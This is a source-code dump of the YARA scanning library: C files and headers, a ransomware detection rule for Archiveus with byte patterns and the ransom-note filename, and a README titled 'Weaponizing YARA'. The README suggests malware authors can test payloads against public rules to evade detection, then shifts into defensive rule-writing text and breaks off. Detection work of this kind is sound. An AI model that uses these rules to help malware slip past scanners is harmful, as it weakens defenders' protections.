certs, CertificateArray* result); 38 | 39 | CertificateArray* parse_signer_chain(X509* signer_cert, STACK_OF(X509) * certs); 40 | int certificate_array_move(CertificateArray* dst, CertificateArray* src); 41 | int certificate_array_append(CertificateArray* dst, CertificateArray* src); 42 | CertificateArray* certificate_array_new(int certCount); 43 | void certificate_array_free(CertificateArray* arr); 44 | 45 | #ifdef __cplusplus 46 | } 47 | #endif 48 | 49 | #endif 50 | -------------------------------------------------------------------------------- /src/lib/stream.c: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2015. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #include 31 | #include 32 | 33 | 34 | size_t yr_stream_read(void* ptr, size_t size, size_t count, YR_STREAM* stream) 35 | { 36 | if (stream->read == NULL) 37 | return 0; 38 | 39 | return stream->read(ptr, size, count, stream->user_data); 40 | } 41 | 42 | 43 | size_t yr_stream_write( 44 | const void* ptr, 45 | size_t size, 46 | size_t count, 47 | YR_STREAM* stream) 48 | { 49 | if (stream->write == NULL) 50 | return 0; 51 | 52 | return stream->write(ptr, size, count, stream->user_data); 53 | } 54 | -------------------------------------------------------------------------------- /src/lib/include/tlshc/tlsh.h: -------------------------------------------------------------------------------- 1 | #ifndef __TLSH_TLSH_H__ 2 | #define __TLSH_TLSH_H__ 3 | 4 | #include 5 | 6 | #define TLSH_OPTION_CONSERVATIVE 2 7 | #define TLSH_OPTION_KEEP_BUCKET 4 8 | #define TLSH_OPTION_PRIVATE 8 9 | #define TLSH_OPTION_THREADED 16 10 | 11 | // Define TLSH_STRING_LEN_REQ, which is the string length of "T1" + the hex 12 | // value of the Tlsh hash. BUCKETS_256 & CHECKSUM_3B are compiler switches 13 | // defined in CMakeLists.txt 14 | #if defined BUCKETS_256 15 | #define TLSH_STRING_LEN_REQ 136 16 | // changed the minimum data length to 256 for version 3.3 17 | #define MIN_DATA_LENGTH 50 18 | // added the -force option for version 3.5 19 | // added the -conservatibe option for version 3.17 20 | #define MIN_CONSERVATIVE_DATA_LENGTH 256 21 | #endif 22 | 23 | #if defined BUCKETS_128 24 | #define TLSH_STRING_LEN_REQ 72 25 | // changed the minimum data length to 256 for version 3.3 26 | #define MIN_DATA_LENGTH 50 27 | // added the -force option for version 3.5 28 | // added the -conservatibe option for version 3.17 29 | #define MIN_CONSERVATIVE_DATA_LENGTH 256 30 | #endif 31 | 32 | #if defined BUCKETS_48 33 | // No 3 Byte checksum option for 48 Bucket min hash 34 | #define TLSH_STRING_LEN 30 35 | // changed the minimum data length to 256 for version 3.3 36 | #define MIN_DATA_LENGTH 10 37 | // added the -force option for version 3.5 38 | #define MIN_CONSERVATIVE_DATA_LENGTH 10 39 | #endif 40 | 41 | #define TLSH_STRING_BUFFER_LEN (TLSH_STRING_LEN_REQ + 1) 42 | 43 | #ifdef __cplusplus 44 | extern "C" { 45 | #endif 46 | 47 | typedef struct TlshImpl TlshImpl; 48 | 49 | typedef struct { 50 | TlshImpl* impl; 51 | } Tlsh; 52 | 53 | Tlsh* tlsh_new(); 54 | void tlsh_free(Tlsh* tlsh); 55 | void tlsh_reset(Tlsh* tlsh); 56 | int tlsh_update(Tlsh* tlsh, const unsigned char* data, unsigned int len); 57 | int tlsh_final(Tlsh* tlsh, const unsigned char* data, unsigned int len, int tlsh_option); 58 | const char* tlsh_get_hash(Tlsh* tlsh, bool showvers); 59 | 60 | #ifdef __cplusplus 61 | } 62 | #endif 63 | 64 | #endif // __TLSH_TLSH_H__ -------------------------------------------------------------------------------- /src/lib/modules/pe/authenticode-parser/countersignature.h: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2021 Avast Software 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of 4 | this software and associated documentation files (the "Software"), to deal 5 | in the Software without restriction, including without limitation the rights to 6 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 7 | of the Software, and to permit persons to whom the Software is furnished to do 8 | so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in all 11 | copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 19 | SOFTWARE. 20 | */ 21 | 22 | #ifndef AUTHENTICODE_PARSER_COUNTERSIGNATURE_H 23 | #define AUTHENTICODE_PARSER_COUNTERSIGNATURE_H 24 | 25 | #include "certificate.h" 26 | #include "helper.h" 27 | #include 28 | #include 29 | #include 30 | 31 | #include 32 | #include 33 | 34 | #ifdef __cplusplus 35 | extern "C" { 36 | #endif 37 | 38 | Countersignature* pkcs9_countersig_new( 39 | const uint8_t* data, long size, STACK_OF(X509) * certs, ASN1_STRING* enc_digest); 40 | Countersignature* ms_countersig_new(const uint8_t* data, long size, ASN1_STRING* enc_digest); 41 | 42 | int countersignature_array_insert(CountersignatureArray* arr, Countersignature* sig); 43 | /* Moves all countersignatures of src and inserts them into dst */ 44 | int countersignature_array_move(CountersignatureArray* dst, CountersignatureArray* src); 45 | 46 | void countersignature_free(Countersignature* sig); 47 | void countersignature_array_free(CountersignatureArray* arr); 48 | 49 | #ifdef __cplusplus 50 | } 51 | #endif 52 | 53 | #endif 54 | -------------------------------------------------------------------------------- /src/lib/include/yara/scan.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2014. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_SCAN_H 31 | #define YR_SCAN_H 32 | 33 | #include 34 | 35 | // 36 | // Flags used with yr_scanner_set_flags and yr_rules_scan_xxx functions. 37 | // 38 | #define SCAN_FLAGS_FAST_MODE 1 39 | #define SCAN_FLAGS_PROCESS_MEMORY 2 40 | #define SCAN_FLAGS_NO_TRYCATCH 4 41 | #define SCAN_FLAGS_REPORT_RULES_MATCHING 8 42 | #define SCAN_FLAGS_REPORT_RULES_NOT_MATCHING 16 43 | 44 | int yr_scan_verify_match( 45 | YR_SCAN_CONTEXT* context, 46 | YR_AC_MATCH* ac_match, 47 | const uint8_t* data, 48 | size_t data_size, 49 | uint64_t data_base, 50 | size_t offset); 51 | 52 | #endif 53 | -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.Archiveus.yara: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule Win32_Ransomware_Archiveus : tc_detection malicious 4 | { 5 | meta: 6 | 7 | author = "ReversingLabs" 8 | 9 | source = "ReversingLabs" 10 | status = "RELEASED" 11 | sharing = "TLP:WHITE" 12 | category = "MALWARE" 13 | malware = "ARCHIVEUS" 14 | description = "Yara rule that detects Archiveus ransomware." 15 | 16 | tc_detection_type = "Ransomware" 17 | tc_detection_name = "Archiveus" 18 | tc_detection_factor = 5 19 | 20 | strings: 21 | 22 | $entry_point = { 23 | 68 ?? ?? 40 00 E8 ?? ?? ?? FF 24 | } 25 | 26 | $dump_instruction = { 27 | 8B 3D ?? ?? ?? ?? 6A ?? FF D7 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 28 | 74 ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ?? 29 | 50 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 30 | ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF D7 FF 15 ?? ?? ?? ?? E9 ?? ?? 31 | ?? ?? 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? 32 | ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 68 ?? ?? ?? ?? 8D 4D ?? 50 51 FF D3 50 8D 55 ?? 8D 33 | 45 ?? 52 50 FF D3 50 FF 15 34 | } 35 | 36 | $extension_rule = { 37 | 8B 13 6A ?? 68 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? D9 85 ?? ?? ?? ?? DB 85 ?? ?? ?? 38 | ?? DD 9D ?? ?? ?? ?? DC 8D ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? 39 | ?? DC 05 ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 89 45 40 | ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 41 | 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ?? 42 | 50 6A ?? 6A ?? 6A ?? FF 15 43 | } 44 | 45 | $instruction_string = "INSTRUCTIONS HOW TO GET YOUR FILES BACK.txt" wide 46 | 47 | condition: 48 | uint16(0) == 0x5A4D and ($entry_point at pe.entry_point) and $dump_instruction and $extension_rule and $instruction_string 49 | 50 | } -------------------------------------------------------------------------------- /src/lib/modules/demo/demo.c: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2014. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #include 31 | 32 | #define MODULE_NAME demo 33 | 34 | begin_declarations 35 | declare_string("greeting"); 36 | end_declarations 37 | 38 | 39 | int module_initialize(YR_MODULE* module) 40 | { 41 | return ERROR_SUCCESS; 42 | } 43 | 44 | 45 | int module_finalize(YR_MODULE* module) 46 | { 47 | return ERROR_SUCCESS; 48 | } 49 | 50 | 51 | int module_load( 52 | YR_SCAN_CONTEXT* context, 53 | YR_OBJECT* module_object, 54 | void* module_data, 55 | size_t module_data_size) 56 | { 57 | yr_set_string("Hello World!", module_object, "greeting"); 58 | 59 | return ERROR_SUCCESS; 60 | } 61 | 62 | 63 | int module_unload(YR_OBJECT* module_object) 64 | { 65 | return ERROR_SUCCESS; 66 | } 67 | -------------------------------------------------------------------------------- /src/lib/include/yara/mem.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_MEM_H 31 | #define YR_MEM_H 32 | 33 | #include 34 | #include 35 | 36 | #ifdef DMALLOC 37 | 38 | #define yr_malloc malloc 39 | #define yr_calloc calloc 40 | #define yr_realloc realloc 41 | #define yr_free free 42 | #define yr_strdup strdup 43 | #define yr_strndup strndup 44 | 45 | #include 46 | 47 | #else 48 | 49 | void* yr_calloc(size_t count, size_t size); 50 | 51 | void* yr_malloc(size_t size); 52 | 53 | void* yr_realloc(void* ptr, size_t size); 54 | 55 | char* yr_strdup(const char* str); 56 | 57 | char* yr_strndup(const char* str, size_t n); 58 | 59 | YR_API void yr_free(void* ptr); 60 | 61 | #endif 62 | 63 | int yr_heap_alloc(void); 64 | 65 | int yr_heap_free(void); 66 | 67 | #endif 68 | -------------------------------------------------------------------------------- /src/lib/include/yara/stream.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2015. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_STREAM_H 31 | #define YR_STREAM_H 32 | 33 | #include 34 | 35 | typedef size_t (*YR_STREAM_READ_FUNC)( 36 | void* ptr, 37 | size_t size, 38 | size_t count, 39 | void* user_data); 40 | 41 | typedef size_t (*YR_STREAM_WRITE_FUNC)( 42 | const void* ptr, 43 | size_t size, 44 | size_t count, 45 | void* user_data); 46 | 47 | typedef struct _YR_STREAM 48 | { 49 | void* user_data; 50 | 51 | YR_STREAM_READ_FUNC read; 52 | YR_STREAM_WRITE_FUNC write; 53 | 54 | } YR_STREAM; 55 | 56 | size_t yr_stream_read(void* ptr, size_t size, size_t count, YR_STREAM* stream); 57 | 58 | size_t yr_stream_write( 59 | const void* ptr, 60 | size_t size, 61 | size_t count, 62 | YR_STREAM* stream); 63 | 64 | #endif 65 | -------------------------------------------------------------------------------- /src/lib/endian.c: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2017. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #include 31 | 32 | uint16_t _yr_bswap16(uint16_t x) 33 | { 34 | return (x >> 8 | x << 8); 35 | } 36 | 37 | uint32_t _yr_bswap32(uint32_t x) 38 | { 39 | return ( 40 | (((x) &0xff000000) >> 24) | (((x) &0x00ff0000) >> 8) | 41 | (((x) &0x0000ff00) << 8) | (((x) &0x000000ff) << 24)); 42 | } 43 | 44 | uint64_t _yr_bswap64(uint64_t x) 45 | { 46 | return ( 47 | (((x) &0xff00000000000000ull) >> 56) | 48 | (((x) &0x00ff000000000000ull) >> 40) | 49 | (((x) &0x0000ff0000000000ull) >> 24) | 50 | (((x) &0x000000ff00000000ull) >> 8) | 51 | (((x) &0x00000000ff000000ull) << 8) | 52 | (((x) &0x0000000000ff0000ull) << 24) | 53 | (((x) &0x000000000000ff00ull) << 40) | 54 | (((x) &0x00000000000000ffull) << 56)); 55 | } 56 | -------------------------------------------------------------------------------- /src/lib/proc/none.c: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007-2017. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #if defined(USE_NO_PROC) 31 | 32 | #include 33 | #include 34 | 35 | int _yr_process_attach(int pid, YR_PROC_ITERATOR_CTX* context) 36 | { 37 | return ERROR_COULD_NOT_ATTACH_TO_PROCESS; 38 | } 39 | 40 | int _yr_process_detach(YR_PROC_ITERATOR_CTX* context) 41 | { 42 | return ERROR_INVALID_ARGUMENT; 43 | } 44 | 45 | YR_API const uint8_t* yr_process_fetch_memory_block_data(YR_MEMORY_BLOCK* block) 46 | { 47 | return NULL; 48 | } 49 | 50 | YR_API YR_MEMORY_BLOCK* yr_process_get_next_memory_block( 51 | YR_MEMORY_BLOCK_ITERATOR* iterator) 52 | { 53 | iterator->last_error = ERROR_SUCCESS; 54 | return NULL; 55 | } 56 | 57 | YR_API YR_MEMORY_BLOCK* yr_process_get_first_memory_block( 58 | YR_MEMORY_BLOCK_ITERATOR* iterator) 59 | { 60 | return NULL; 61 | } 62 | 63 | #endif 64 | -------------------------------------------------------------------------------- /src/lib/include/yara/proc.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_PROC_H 31 | #define YR_PROC_H 32 | 33 | #include 34 | 35 | typedef struct _YR_PROC_ITERATOR_CTX 36 | { 37 | const uint8_t* buffer; 38 | size_t buffer_size; 39 | YR_MEMORY_BLOCK current_block; 40 | void* proc_info; 41 | } YR_PROC_ITERATOR_CTX; 42 | 43 | YR_API int yr_process_open_iterator( 44 | int pid, 45 | YR_MEMORY_BLOCK_ITERATOR* iterator); 46 | 47 | YR_API int yr_process_close_iterator(YR_MEMORY_BLOCK_ITERATOR* iterator); 48 | 49 | YR_API YR_MEMORY_BLOCK* yr_process_get_first_memory_block( 50 | YR_MEMORY_BLOCK_ITERATOR* iterator); 51 | 52 | YR_API YR_MEMORY_BLOCK* yr_process_get_next_memory_block( 53 | YR_MEMORY_BLOCK_ITERATOR* iterator); 54 | 55 | YR_API const uint8_t* yr_process_fetch_memory_block_data( 56 | YR_MEMORY_BLOCK* block); 57 | 58 | #endif 59 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Weaponizing YARA 2 | 3 | As we all know **YARA** ( language ) is a big thing in cyber security industry, it could be used as a tool for both side of the team. 4 | In here maybe a ( project ) from an attackers perspective: 5 | > - Quality Assurance: Malware developers can use YARA to ensure their creations are not inadvertently detected by publicly available rules before deployment. 6 | > - Code Reuse Identification: Identifying reused code snippets from known malware to leverage existing techniques while avoiding detection. 7 | 8 | from a **deffensive** role perspective: 9 | We develop rules for new threats, and after their quality has been proven through testing in our cloud and other environments. 10 | These rules have been written by our `threat` analysts, for threat hunters, incident responders, security analysts, and other defenders that could benefit from deploying high-quality threat detection YARA rules in their environment. 11 | 12 | Our detection rules, as opposed to hunting rules, need to satisfy certain criteria to be eligible for deployment, namely: 13 | * be as precise as possible, without losing detection quality 14 | * aim to provide zero false-positive detections 15 | 16 | In order for the `rules` to be easy to understand and maintain, we adopted the following set of goals: 17 | > - clearly named byte patterns 18 | - readable and transparent conditions 19 | - match unique malware functionality 20 | - prefer code byte patterns over strings 21 | 22 | To ensure the quality of our rules, we continuously and extensively test them in our cloud, on over 10B (and rising) unique 